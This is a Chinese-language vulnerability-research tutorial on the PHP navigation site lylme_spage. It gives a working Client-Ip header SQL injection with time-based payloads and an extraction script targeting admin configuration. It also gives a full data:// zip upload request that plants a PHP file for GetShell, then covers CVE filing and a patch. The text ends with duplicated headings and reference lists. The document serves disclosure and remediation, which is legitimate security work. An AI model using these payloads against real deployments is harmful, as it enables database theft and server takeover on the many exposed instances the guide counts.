开源项目CVE挖掘实战指南：从SQL注入到GetShell的完整流程<\/h1>

1. 背景与目标<\/h2>

1.1 背景概述<\/h3>
CVE（Common Vulnerabilities and Exposures）是通用漏洞披露系统<\/li>
获取高质量的CVE编号对安全研究人员具有重要意义<\/li>
本文以开源项目
lylme_spage<\/code>为例，展示完整漏洞挖掘流程<\/li>
<\/ul>
1.2 目标筛选标准<\/h3>

GitHub Star ≥ 300<\/li>
Fofa\/Hunter搜索独立IP ≥ 500<\/li>
项目代码质量适中（非明显靶场类代码）<\/li>
优先选择前台可直接利用的高危漏洞（如RCE、代码执行）<\/li>
<\/ul>
2. 目标项目分析<\/h2>
2.1 项目概况<\/h3>

项目名称：lylme_spage（导航类网站）<\/li>
GitHub数据：Star 313，Fork 72<\/li>
网络资产：Fofa独立IP 800+，有效资产2400+<\/li>
<\/ul>
2.2 鉴权机制分析<\/h3>

后台目录：\/admin<\/li>
关键鉴权变量：$islogin<\/code><\/li>
鉴权方式：

直接判断：admin\/ajax_link.php<\/code>等文件直接检查$islogin<\/code><\/li>
间接判断：通过head.php<\/code>文件引入鉴权逻辑<\/li>
<\/ul>
<\/li>
<\/ul>
2.3 鉴权绕过尝试<\/h3>


查找未鉴权文件<\/strong>：<\/p>
grep -v --include "*php*"<\/span> -rl 'isset($islogin)'<\/span> .\/admin
<\/span><\/span>grep --include "*php*"<\/span> -rL 'isset($islogin)'<\/span> .\/admin | xargs -I {}<\/span> grep -n -L 'head.php'<\/span> {}<\/span>
<\/span><\/span><\/code><\/pre>结果：仅找到admin\/cache.php<\/code>和admin\/footer.php<\/code>，无利用价值<\/p>
<\/li>

逻辑绕过分析<\/strong>：<\/p>

关键鉴权代码位于include\/member.php<\/code><\/li>
基于$_COOKIE["admin_token"]<\/code>验证<\/li>
存在弱类型比较（==<\/code>而非===<\/code>），但利用条件苛刻<\/li>
<\/ul>
<\/li>
<\/ol>
3. 前台SQL注入漏洞挖掘<\/h2>
3.1 漏洞定位<\/h3>

漏洞文件：apply\/index.php<\/code><\/li>
关键函数调用：apply($_POST['name'], $_POST['url'], $_POST['icon'], $_POST['group_id'], $status)<\/code><\/li>
<\/ul>
3.2 注入点分析<\/h3>

SQL语句构造：
$sql =<\/span> "INSERT INTO `lylme_apply` (...) VALUES (NULL, '"<\/span>.<\/span>$name.<\/span>url<\/span>.<\/span>group_id<\/span>.<\/span>icon<\/span>.<\/span>userip<\/span>.<\/span>date<\/span>.<\/span>status<\/span>.<\/span>"');"<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
可控变量：$userip<\/code>（来自get_real_ip()<\/code>函数）<\/li>
<\/ul>
3.3 注入利用链<\/h3>


IP获取函数分析<\/strong>：<\/p>
function<\/span> get_real_ip<\/span>() {
<\/span><\/span>    if<\/span> (isset<\/span>($_SERVER['HTTP_X_FORWARDED_FOR'<\/span>])) {
<\/span><\/span>        \/\/ 只取第一个IP
<\/span><\/span><\/span><\/span>    } elseif<\/span> (isset<\/span>($_SERVER['HTTP_CLIENT_IP'<\/span>])) {
<\/span><\/span>        $real_ip =<\/span> $_SERVER['HTTP_CLIENT_IP'<\/span>];
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $real_ip;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
可利用Client-Ip<\/code>头完全控制IP值<\/li>
<\/ul>
<\/li>

注入验证<\/strong>：<\/p>

请求示例：
POST<\/span> \/lylme_spage-master\/apply\/index.php?submit=post HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> localhost:7777<\/span>
<\/span><\/span>Client-Ip:<\/span> 127.0.0.1'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
单引号报错，双引号正常，确认注入存在<\/li>
<\/ul>
<\/li>
<\/ol>
3.4 注入利用限制与绕过<\/h3>


限制因素<\/strong>：<\/p>

INSERT类型注入<\/li>
使用mysqli_query<\/code>，不支持多语句<\/li>
验证码校验（但可复用）<\/li>
URL不能重复<\/li>
<\/ul>
<\/li>

利用技巧<\/strong>：<\/p>

使用exp(999)<\/code>结合if<\/code>条件实现报错注入<\/li>
示例Payload：
Client-Ip:0'>if(ord(substring(user(),1,1))=114,sleep(5)&exp(999),exp(999))>'
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>
<\/ol>
3.5 自动化利用脚本<\/h3>
def<\/span> exploit<\/span>(target, cookie, authcode, timeout=<\/span>5<\/span>):
<\/span><\/span>    origin_payload =<\/span> "select group_concat(v) from lylme_config where k like 'admin%'"<\/span>
<\/span><\/span>    # 获取长度<\/span>
<\/span><\/span>    length_payload =<\/span> f<\/span>"length((<\/span>{<\/span>origin_payload}<\/span>))"<\/span>
<\/span><\/span>    # 延时5s<\/span>
<\/span><\/span>    if<\/span> timeout <<\/span> 1<\/span>:
<\/span><\/span>        timeout +=<\/span> 1<\/span>
<\/span><\/span>    length =<\/span> 0<\/span>
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        length +=<\/span> 1<\/span>
<\/span><\/span>        final_length_payload =<\/span> f<\/span>"0'>if(<\/span>{<\/span>length_payload}<\/span>=<\/span>{<\/span>(length)}<\/span>,sleep(<\/span>{<\/span>timeout}<\/span>)&exp(999),exp(999))>'"<\/span>
<\/span><\/span>        print(f<\/span>"[*] Trying Length: <\/span>{<\/span>length}<\/span>"<\/span>)
<\/span><\/span>        r1 =<\/span> post(target, cookie, authcode, final_length_payload)
<\/span><\/span>        if<\/span> r1.<\/span>elapsed.<\/span>total_seconds() ><\/span> timeout -<\/span> 1<\/span>:
<\/span><\/span>            break<\/span>
<\/span><\/span>    # 获取数据...<\/span>
<\/span><\/span><\/code><\/pre>4. 后台任意文件上传GetShell<\/h2>
4.1 漏洞定位<\/h3>

漏洞文件：admin\/ajax_link.php<\/code><\/li>
关键代码：
$RemoteFile =<\/span> $_POST['file'<\/span>];
<\/span><\/span>copy<\/span>($RemoteFile, $LocalFile);
<\/span><\/span>$zip =<\/span> new<\/span> ZipArchive<\/span>;
<\/span><\/span>$zip-><\/span>open<\/span>($LocalFile);
<\/span><\/span>$zip-><\/span>extractTo<\/span>('..\/'<\/span>);
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
4.2 利用步骤<\/h3>


创建恶意zip文件：<\/p>
echo '<?php phpinfo();?>'<\/span> > 1.php
<\/span><\/span>zip 1.php.zip 1.php
<\/span><\/span><\/code><\/pre><\/li>

构造base64 payload：<\/p>
import<\/span> zipfile,<\/span> base64,<\/span> io
<\/span><\/span>zip_data =<\/span> io.<\/span>BytesIO()
<\/span><\/span>with<\/span> zipfile.<\/span>ZipFile(zip_data, 'w'<\/span>) as<\/span> zipf:
<\/span><\/span>    zipf.<\/span>writestr("1.php"<\/span>, "<?php phpinfo();?>"<\/span>)
<\/span><\/span>zip_data.<\/span>seek(0<\/span>)
<\/span><\/span>payload =<\/span> "data:\/\/text\/plain;base64,"<\/span> +<\/span> base64.<\/span>b64encode(zip_data.<\/span>read()).<\/span>decode()
<\/span><\/span><\/code><\/pre><\/li>

发送恶意请求：<\/p>
POST<\/span> \/lylme_spage-master\/admin\/ajax_link.php?submit=update HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> localhost:7777<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>file=data:\/\/text\/plain;base64,UEsDBBQAAAAIALMUSFdQg8x9EgAAABIAAAAFAAAAMS5waHCzsS\/IKFAA4sy8tHwNTWt7OwBQSwECFAMUAAAACACzFEhXUIPMfRIAAAASAAAABQAAAAAAAAAAAAAAgAEAAAAAMS5waHBQSwUGAAAAAAEAAQAzAAAANQAAAAAA
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5. CVE申请流程<\/h2>
5.1 准备工作<\/h3>


在GitHub提交Issue：<\/p>

包含复现步骤、预期行为、实际行为、受影响版本、修复建议<\/li>
示例Issue：https:\/\/github.com\/LyLme\/lylme_spage\/issues\/32<\/li>
<\/ul>
<\/li>

准备英文报告（推荐使用DeepL翻译）<\/p>
<\/li>
<\/ol>
5.2 CVE申请步骤<\/h3>

访问CVE提交平台：https:\/\/cveform.mitre.org<\/li>
填写申请表：

Request type: Report Vulnerability\/Request CVE ID<\/li>
填写漏洞类型、影响组件、攻击向量等信息<\/li>
提供漏洞描述模板：
A vulnerability has been found in [lylme_spage v1.7.0] and classified as [critical]. 
Affected by this vulnerability is the file [\/include\/function.php]. 
The manipulation of [the HTTP Header Client-Ip] leads to [sql injection]. 
The attack can be launched remotely. CWE Definition of the Vulnerability [CWE-89].
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>
提交后等待审核（约8天）<\/li>
<\/ol>
5.3 最终成果<\/h3>

分配CVE编号：CVE-2023-45951、CVE-2023-45952<\/li>
NVD评分：9.8（高危）<\/li>
<\/ul>
6. 漏洞修复与PR提交<\/h2>
6.1 修复方案<\/h3>
function<\/span> get_real_ip<\/span>() {
<\/span><\/span>    \/\/ ...原有代码...
<\/span><\/span><\/span><\/span>    if<\/span> (filter_var<\/span>($real_ip, FILTER_VALIDATE_IP<\/span>)) {
<\/span><\/span>        return<\/span> $real_ip;
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        return<\/span> ""<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6.2 PR提交步骤<\/h3>

Fork目标仓库<\/li>
创建修复分支：
git checkout -b bugfix
<\/span><\/span>git add include\/function.php
<\/span><\/span>git commit -m "验证IP合法性,防止SQL注入"<\/span>
<\/span><\/span>git push --set-upstream origin bugfix
<\/span><\/span><\/code><\/pre><\/li>
在GitHub提交Pull Request<\/li>
等待项目维护者合并<\/li>
<\/ol>
7. 关键知识点总结<\/h2>

项目筛选<\/strong>：选择Star≥300、独立IP≥500的开源项目<\/li>
审计技巧<\/strong>：

优先审计前台无需认证的功能<\/li>
关注用户可控的输入点（如HTTP头、POST参数）<\/li>
<\/ul>
<\/li>
SQL注入利用<\/strong>：

INSERT注入的特殊利用方式<\/li>
exp(999)<\/code>在条件判断中的妙用<\/li>
<\/ul>
<\/li>
文件上传绕过<\/strong>：

利用PHP伪协议（data:\/\/）<\/li>
内存中生成恶意zip文件<\/li>
<\/ul>
<\/li>
CVE申请<\/strong>：

规范的漏洞描述模板<\/li>
完整的复现步骤证明<\/li>
<\/ul>
<\/li>
修复建议<\/strong>：

输入验证（如filter_var<\/code>）<\/li>
最小权限原则<\/li>
<\/ul>
<\/li>
<\/ol>
8. 参考资源<\/h2>

CVE官网：https:\/\/cve.mitre.org<\/li>
NVD数据库：https:\/\/nvd.nist.gov<\/li>
DeepL翻译：https:\/\/www.deepl.com<\/li>
CVE申请表单：https:\/\/cveform.mitre.org<\/li>
<\/ol>
开源项目CVE挖掘实战指南：从SQL注入到GetShell的完整流程<\/h1>

1. 背景与目标<\/h2>

2. 目标项目分析<\/h2>

3. 前台SQL注入漏洞挖掘<\/h2>

4. 后台任意文件上传GetShell<\/h2>

5. CVE申请流程<\/h2>

6. 漏洞修复与PR提交<\/h2>

8. 参考资源<\/h2> CVE官网：https:\/\/cve.mitre.org<\/li> NVD数据库：https:\/\/nvd.nist.gov<\/li> DeepL翻译：https:\/\/www.deepl.com<\/li> CVE申请表单：https:\/\/cveform.mitre.org<\/li> <\/ol>

8. 参考资源<\/h2>

CVE官网：https:\/\/cve.mitre.org<\/li>
NVD数据库：https:\/\/nvd.nist.gov<\/li>
DeepL翻译：https:\/\/www.deepl.com<\/li>
CVE申请表单：https:\/\/cveform.mitre.org<\/li> <\/ol>
